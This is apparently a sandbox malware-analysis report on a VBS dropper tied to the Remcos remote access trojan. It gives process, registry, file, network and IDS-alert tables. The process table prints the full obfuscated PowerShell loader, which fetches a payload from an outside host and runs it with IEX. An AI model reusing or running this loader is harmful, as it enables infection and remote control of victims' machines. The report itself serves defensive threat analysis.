| File name: | 4500376739.vbs |
| Full analysis: | https://app.any.run/tasks/5b966ea8-3f29-46a9-bb0f-d832a323f193 |
| Verdict: | Malicious activity |
| Threats: | Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. |
| Analysis date: | May 19, 2025, 12:04:37 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (346), with CRLF line terminators |
| MD5: | 89E378F3D98EA7E2923BA3BBE72365D8 |
| SHA1: | 91465D7A633CE29BA47D60C936CE8700B93341AB |
| SHA256: | 0F9F183E49C35B4126203D15992146683E43BB8EA9561B50A3CEFEF95422FA42 |
| SSDEEP: | 1536:HwwlG3j0KfNk+U2NkA7YNvbpEn7bTfqNkOjdGO+Qbw7mNMh:HqjDfNk+UekA7YNv9E7/qNkOJGODbwaO |
| PID | CMD | Path | Indicators | Parent process | User | Company | Integrity level | Description | Exit code | Version |
|---|---|---|---|---|---|---|---|---|---|---|
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | — | services.exe | NETWORK SERVICE | Microsoft Corporation | SYSTEM | Host Process for Windows Services | — | 10.0.19041.1 (WinBuild.160101.0800) |
| 4428 | C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\admin\AppData\Local\Temp\wsrakhzufghidjgyzvngsw" | C:\Windows\SysWOW64\svchost.exe | — | msiexec.exe | admin | Microsoft Corporation | MEDIUM | Host Process for Windows Services | 0 | 10.0.19041.1 (WinBuild.160101.0800) |
| 5428 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | admin | Microsoft Corporation | MEDIUM | Console Window Host | 0 | 10.0.19041.1 (WinBuild.160101.0800) |
| 5720 | C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\admin\AppData\Local\Temp\gmwllajotoznoxccqgazvbhuiu" | C:\Windows\SysWOW64\svchost.exe | — | msiexec.exe | admin | Microsoft Corporation | MEDIUM | Host Process for Windows Services | 0 | 10.0.19041.1 (WinBuild.160101.0800) |
| 6028 | "C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\4500376739.vbs | C:\Windows\System32\wscript.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft ® Windows Based Script Host | 0 | 5.812.10240.16384 |
| 6644 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | — | svchost.exe | admin | Microsoft Corporation | MEDIUM | Windows Activation Client | — | 10.0.19041.1 (WinBuild.160101.0800) |
| 6712 | C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\admin\AppData\Local\Temp\rojdlsuphwraqeqgzrvbgobdrjduc" | C:\Windows\SysWOW64\svchost.exe | — | msiexec.exe | admin | Microsoft Corporation | MEDIUM | Host Process for Windows Services | 0 | 10.0.19041.1 (WinBuild.160101.0800) |
| 6872 | C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\admin\AppData\Local\Temp\gmwllajotoznoxccqgazvbhuiu" | C:\Windows\SysWOW64\svchost.exe | — | msiexec.exe | admin | Microsoft Corporation | MEDIUM | Host Process for Windows Services | 0 | 10.0.19041.1 (WinBuild.160101.0800) |
| 6972 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;Get-History;$Metalraffinaderis=(Get-Command A:).CommandType;$Metalraffinaderis=[String]$Metalraffinaderis;$Ladhood='Stabejs';$Metalraffinaderis+=':';(n`i -p $Metalraffinaderis -n Analysearbejde -value { param ($Kioskejere);$Eddikebryggeren=4;do {$Forundersges+=$Kioskejere[$Eddikebryggeren];$Eddikebryggeren+=5} until(!$Kioskejere[$Eddikebryggeren])$Forundersges});(n`i -p $Metalraffinaderis -n Skndegstens -value {param ($Chromotropism126);.($Goodies) ($Chromotropism126)});ConvertTo-Html;$Formulary=Analysearbejde 'F.rhn ,etECa,lt Vir.,ushW';$Formulary+=Analysearbejde ' Mu.eSlbnb Sb cForsL LniiPhotEEva NTae,T';$Skovturenes=Analysearbejde 'HoveM ebroGubezQuaiiFelilSnorlS araPhot/';$Comourner=Analysearbejde 'SobeTMenilBry sMar 1Klas2';$Eddikebryggerenndsyltet='Civi[aporn dagE G,stMeda.SottSMetaeAggrrLeerVDelai RescUlaseReciPTottO Alli FednMaratLinjmExcaa inN.okyaDag GScraeDeltR ids] Ak :Over:Oml s Coue enc Sa,uCariROveriradiT.narY.dtyPSideR FurODybgT CatO StacFon oTeksLSn p=Unco$AfblCnrmeOCo.nmTel oSo.ou fasRQuernTrafERe lr';$Skovturenes+=Analysearbejde ' Fr 5Indb.Svin0Detu Sau.(Cop,W Spai LinnpatrdM nio etawSalvsmiss ,aeaNByggT Bid Kabi1Omga0Bi p.Demi0F rv;Juge nuWStoiiK.chn Kap6Cah,4Fab ; Afl k.axRom 6Rena4 ,ur; P r Tupr Fisv br.:Apte1Sp o3 .dp7Chol.Krim0 Ove)tern NabuGTonneSyttcOv rk Ph.oSke /Impe2 opn0ring1Nonv0miss0 S.a1Untr0Dron1 Unc DizeFLegeiDuverBog.eCivifLavao FrexPres/ Lam1Aand3bumb7Tele.tho 0';$Skatteprocenten=Analysearbejde 'TartUOutys AfleT.thRBr.g-Blaaa Sj ggas.e TronCheeT';$spoonism=Analysearbejde 'Sk lhPar tSofftV depVaids Lok:Stra/ ds/UncamrewiaBuprcFusikNedb-Belic,roao HomnKnipcExcooInfir Nasd Fac.infahAfstrValu/S ifSCap u ,amplandeHypnrou bv triNedrtBedaaInt.lSamviPasttRounyAlbu.Proch,onthMidmk';$switchgrass=Analysearbejde 'Oftt>';$Goodies=Analysearbejde 'SawdI DodE Ba.x';$Stallion='Unmarriageable';$Philotheist='\Rigsombuddene3.Jer';Skndegstens (Analysearbejde 'Opga$T,heg Dial S.rOAfs BCamoastamLFagr:JordfBjeroSpi.r ParnAsiaI klacDibsa O,otend,RDkm IXyliX Kiw=Inco$ BalECo nnTourvBort:PaanA p npIndupRhamD pyaAV nnT S.bAUni,+ sag$SammpSe thDeseIChl L dbrOForvTAr.eHSvinE RicIThersUncaT');Skndegstens (Analysearbejde 'Dip $GrumgI seLO seOInteb,ornAJul.lRegr: galC MacADokuTOlshS E tU I,dIB ggtO sa=Fabl$ PersScenP ArioAposOKoldNIa tIsl ss indmGaar.StjestogoP ncolBlusIFejlTUdf.( Emb$D atsW chwA.syiDataT SpicNervhSaalGpej,RRubrAAmalsKla.S Beg)');Skndegstens (Analysearbejde $Eddikebryggerenndsyltet);$spoonism=$Catsuit[0];$Chloridate=(Analysearbejde ' Por$ cqugKul lSlano naB Thaa SkolPo p:,jasapl gN ColSAdspEFortiFejls gyn=ZygaNVeriEBackW Hv -UdliOStraBBlafj ine OpkC VanT Re. SpecS Ta yApposGambTCenaeD ndMEnke.Ranu$CharfAnicOCounrFeofMSml uOutslMonoA CidrOrn.Y');Skndegstens ($Chloridate);Skndegstens (Analysearbejde 'Pres$Coz APananPhilsAfg etu,aiSelvsAbb .PredH krieEleka Be.dBarneW amr IntsBrem[Samm$TripSEx ukVi iaSak,t AlrtQueee rinpCommrVerto eolcMarkeT lbnPro tCaloeSnolnE.cl]thun= olb$PostSAnt kSumpo DisvOstrt,roluCivirob yeL vbnFriteceres');$Materiality=Analysearbejde 'KlasDInefo Ec wRunonudvilRe doMewea I edPav.FSp,oi,ammlg.lge';$Kendingsbogstavs=Analysearbejde 'Que $NedbASilanNesosLgnie Soci StosDi.n.Appl$ ,rsM ChoaOutwtRecoe unirKompiFlesa SnilC stiSkintSnftyEnev.JittIBylinM ecvPreeo Ra kSsl e Liv(Juli$.eurssk.ipShilorecooSvejnDeliiPseus orbmcoxp, Tra$UlvsCEscahdateiSa.enPr fcIndkhBabyoMil.n kumaM,hw)';$Chinchona=$Fornicatrix;Skndegstens (Analysearbejde 'P nt$Nonfg PrelUnguoTintbTrisaPoecLUnsc:IntrT hamIGerolrorssQuinyli vNAabesRichvU,amREkseGUntoe TiprIm l=udr (TubuTUndoes.arsEdittafsv-billppol,a DigT Forhpi k Tinu$TokrcArrihbortI A.kNSsonCKerah ru oSt,mnHoloASkov)');while (!$Tilsynsvrger) {Skndegstens (Analysearbejde ' In $ArtigMahdl R.moRu obSoddaUnwrlApp :non Y B,loL chr,ookuFr,tb Unda Lon=Yaud$ pe,R ranePuslcgul,o AlllP,rioCa.unEll iDunds risi Sk nHolbg') ;Skndegstens $Kendingsbogstavs;Skndegstens (Analysearbejde 'Sid,[ ,istSub H StirordnE.rafAAnalDmeliIPrivnSinaGSoci. Pu t utihRu lR vereFor.aMeriD ral]Send:E.li:Kri,S orLVegheInd ESverPMeta(Firt4arki0Koll0Disk0Phas)');Skndegstens (Analysearbejde 'samt$ Squg verlCaphoIndrb.ispAT icL K a: uelTEntrIDoctlJordsOrigYParan ubhsRediV,calRSus g CyrE Frpr U h=Samm(Pse TBrn e SteSSamhT Bu -arglP GlyAPl rT SteH ixo Spa$,onfcClothGutti IntNUndec Ta.h forONonanBacka Ro,)') ;Skndegstens (Analysearbejde 'Seng$ An gst glPensoYndiB UdgAK leL,dbl:S mrh,yndaf rfsChirtUndieOlymbThioE TilHSm,laMargN PaldBacklFruiiAr,cnCat,G Do 1Inde1Whol9B,ha=Forf$KlyvGRespl.ntooShelbSestaEsneLG,ng:VersMPo ee SamlTrakls oeEFrodMSidelMeloABogtnUnp DFronE ,roSSla.+Miso+ Gou%Ex m$ lacc SomALaurTKommSGoldU F.riKamgt.iff..othChepaOundeuovernGoggt') ;$spoonism=$Catsuit[$Hastebehandling119]}$Bombycina=403227;$Admiralskibets=30129;Skndegstens (Analysearbejde 'Hyst$PycnG Ulyl t lO A,tBContaKartlP,li:Flerg F yiP sifBrystOt asBlgft xceO M lffoo,F R sEK rst Lyd drom=Mded onsGG thEB,titSkul-UnprC BreoDat,NWarntindkeeas,n AboTMisa S ol$ Grac RaaHKrngi UlyNstr CUretHSp dOOu.tnFladA');Skndegstens (Analysearbejde 'Svm $MincgAp rl.ostoLivsbSultaZe,hl.aas:BrdrTPolerBrodiKha vDispi StoaCo.tlDa,piPu lzRusteEnt d B l2Grde N nr=,ogi Tit [InddS ,ony ellsAntitMilbeWidgmSte..InduCA bioGravnSandv MareTestr Hemtun r]In.r:Mo,n:S raFF abrbagloV.scmBdniB FriaM,sds BraeIns 6dr.g4SkynSStratConsr viri esenpimpg,one(Vell$SkorGzairi GenfFasctArjusMinitCokeoCochfMethfSandeBombtS rn)');Skndegstens (Analysearbejde 'Form$M,toGComplAfvaoDispb py.aKli L Ree: Dism ManaTrskAGuesLTilhRRedne UniT R,dTNedhEAntiT U shan lEBaryD fo.2Inva0 Scu6sort Tamb=S.na Forn[Lamis vonYLystsConntKa aERe,nmChir.TotrtwoodE,ndkxEsteT Dek.Ta lEretaNEnstC enO PseDSaudiRuniNTr,vg oti]Amba:Fo s:ChauANoneS.iatC Va.iChu iSwed. PargS ngeJitstSkads A,it.kolREnfeIU.gaNM mrg Rya( Ter$ eteTPriorSupeIFormV,udeiCheqaFnerlO eri ModZBjereUn,eD .yd2Ekse)');Skndegstens (Analysearbejde ' Kla$Collg Re,ls ahOStroBVaccaGazalSar.:ConsfprepL pkaiOrgak rniKSi iePe uR lkeNPrfoE TatSRig =Bevi$br,cM ingaCryaa.almL skrRSockE DefT AxotSkoleKo ptsuichHorte VanDMinu2Inte0Stol6 Tel.Bj.rSfoxtuContbDecosKrantGldeRInveiOutlnKa dGZarr(Trav$O erBEskaO oyumNatrBpleuyEquiCStreiGu dN fenaRegr,Pewe$Ko kADigedM rcmAdmiiApt rInc AskatLCentSMoleKGeori CraBD kuEa.buTSquaSOrp )');Skndegstens $Flikkernes;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 10.0.19041.1 (WinBuild.160101.0800) |
| 7212 | C:\WINDOWS\system32\SppExtComObj.exe -Embedding | C:\Windows\System32\SppExtComObj.Exe | — | svchost.exe | NETWORK SERVICE | Microsoft Corporation | SYSTEM | KMS Connection Broker | — | 10.0.19041.3996 (WinBuild.160101.0800) |
| PID | Process | Key | Operation | Name | Value |
|---|---|---|---|---|---|
| 8120 | msiexec.exe | HKEY_CURRENT_USER\SOFTWARE\Rmc-EWF6LQ | write | exepath | 824A6EAE6DA02B450D964582585E8ACA33E0B08C3D6E24A3BE90801D3D8E51BD38AE8E174E1A22E93DA63EE3DD468E26668B74FC9CC6ACF11C74DA991242F3B1 |
| 8120 | msiexec.exe | HKEY_CURRENT_USER\SOFTWARE\Rmc-EWF6LQ | write | licence | 280EEA1D9A2144D92671B774022FACDF |
| 8120 | msiexec.exe | HKEY_CURRENT_USER\SOFTWARE\Rmc-EWF6LQ | write | time | |
| 8120 | msiexec.exe | HKEY_CURRENT_USER\SOFTWARE\Rmc-EWF6LQ | write | UID | 784760180 |
| 8120 | msiexec.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | write | CachePrefix | |
| 8120 | msiexec.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | write | CachePrefix | Cookie: |
| 8120 | msiexec.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | write | CachePrefix | Visited: |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 4428 | svchost.exe | C:\Users\admin\AppData\Local\Temp\bhv7944.tmp | — | — | — |
| 6972 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_guz4qjsb.ijh.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 6972 | powershell.exe | C:\Users\admin\AppData\Roaming\Rigsombuddene3.Jer | text | 16BF1C07785A2D90C4F69999BF6C9E77 | A2056845C83EED44031E59495DDB86CC12D6C847D385914E83728769DC446528 |
| 8120 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\TH7905.tmp | executable | 0FCD0296CAEAD9343FCDAD3584F64A18 | 71DD98860F562A59C39BE6EE5A40B35F29FCA1B13BCF0828B55613DAD0A67760 |
| 8120 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\TH7927.tmp | executable | C2FF41EE5E0C9B1259F263ADC8A52363 | 3455CB53E4BD4BE7279D770ED6C45004FA5B10C0CED2B2F110BB1E5DC8CE972B |
| 4428 | svchost.exe | C:\Users\admin\AppData\Local\Temp\wsrakhzufghidjgyzvngsw | text | 73AFEF57A57FF8285682E59AEBA8FE4A | 9081F636845E9A6B7D781F2F35A28B33B7FDF5373075B435C5B373119D0934A3 |
| 7768 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lylkkj24.k0b.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 7768 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | 8E7D26D71A1CAF822C338431F0651251 | 495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084 |
| 6972 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | 70BE6AE8DAF3D061EF303803DEAD93DC | 108BAC62CDCFA93F4238F293EA610B6BB617C69A075E5600B1940FE2EF3243FE |
| 8120 | msiexec.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | binary | E192462F281446B5D1500D474FBACC4B | F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60 |
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| — | — | GET | 200 | 23.216.77.33:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
| — | — | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
| 6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
| 8120 | msiexec.exe | GET | 200 | 69.192.161.44:80 | http://x1.c.lencr.org/ | unknown | — | — | whitelisted |
| 8032 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
| 8120 | msiexec.exe | GET | 200 | 184.24.77.54:80 | http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgVUTXRP3GD61jDYQ3Ez90wEpQ%3D%3D | unknown | — | — | whitelisted |
| 8032 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
| 8120 | msiexec.exe | GET | 200 | 178.237.33.50:80 | http://geoplugin.net/json.gp | unknown | — | — | whitelisted |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
| — | — | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
| — | — | 23.216.77.33:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
| — | — | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
| 4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
| 3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted |
| 6972 | powershell.exe | 195.29.178.20:443 | mack-concord.hr | Hrvatski Telekom d.d. | HR | unknown |
| 6544 | svchost.exe | 40.126.31.130:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
| 6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
| 2104 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
| Domain | IP | Reputation |
|---|---|---|
| settings-win.data.microsoft.com | — | whitelisted |
| crl.microsoft.com | — | whitelisted |
| www.microsoft.com | — | whitelisted |
| google.com | — | whitelisted |
| client.wns.windows.com | — | whitelisted |
| mack-concord.hr | — | unknown |
| login.live.com | — | whitelisted |
| ocsp.digicert.com | — | whitelisted |
| slscr.update.microsoft.com | — | whitelisted |
| fe3cr.delivery.mp.microsoft.com | — | whitelisted |
| PID | Process | Class | Message |
|---|---|---|---|
| 2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain |
| 8120 | msiexec.exe | A Network Trojan was detected | REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash |
| 2196 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain |
| 8120 | msiexec.exe | Malware Command and Control Activity Detected | ET JA3 Hash - Remcos 3.x/4.x TLS Connection |
| 8120 | msiexec.exe | A Network Trojan was detected | REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash |
| 8120 | msiexec.exe | Malware Command and Control Activity Detected | ET JA3 Hash - Remcos 3.x/4.x TLS Connection |